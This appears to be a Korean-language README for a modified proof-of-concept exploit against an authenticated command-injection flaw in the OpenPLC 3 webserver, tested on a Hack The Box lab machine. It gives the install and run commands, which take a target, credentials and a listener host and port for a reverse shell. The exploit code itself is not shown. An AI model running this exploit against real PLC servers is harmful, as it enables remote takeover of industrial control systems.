
OpenPLC 3 WebServer 인증된 원격 코드 실행
OpenPLC 3 웹서버 인증된 원격 코드 실행.
Open PLC Webserver v3에 명령 삽입 취약점이 존재하여 원격 공격자가 임의 코드를 실행할 수 있습니다. HTB Wifinetictwo.htb 머신에서만 테스트되었습니다.
취약점을 익스플로잇하는 모든 스크립트에서 문제를 발견했습니다. 아마도 제가 파럿(Parrot)을 사용하거나 제 브라우저 때문일 수 있습니다. 크롬은 로그인에 작동하지만, 파이어폭스에서는 로그인 문제가 있었고 웹 서버에 POST 요청으로 로그인할 때 이상한 현상이 발생했습니다.
저는 thewhiteh4t의 스크립트를 수정했습니다. 일부 부분(주로 업로드 방법)은 그대로 복사했지만, 서버에서 쿠키를 획득하여 익스플로잇을 실행하는 부분을 변경했습니다.
원본 PoC는 Fellipe Oliveira가 제공했습니다.
이것이 문제가 있을 때 도움이 되길 바랍니다.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
대안으로, exploit.py를 수정할 수 있습니다.
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass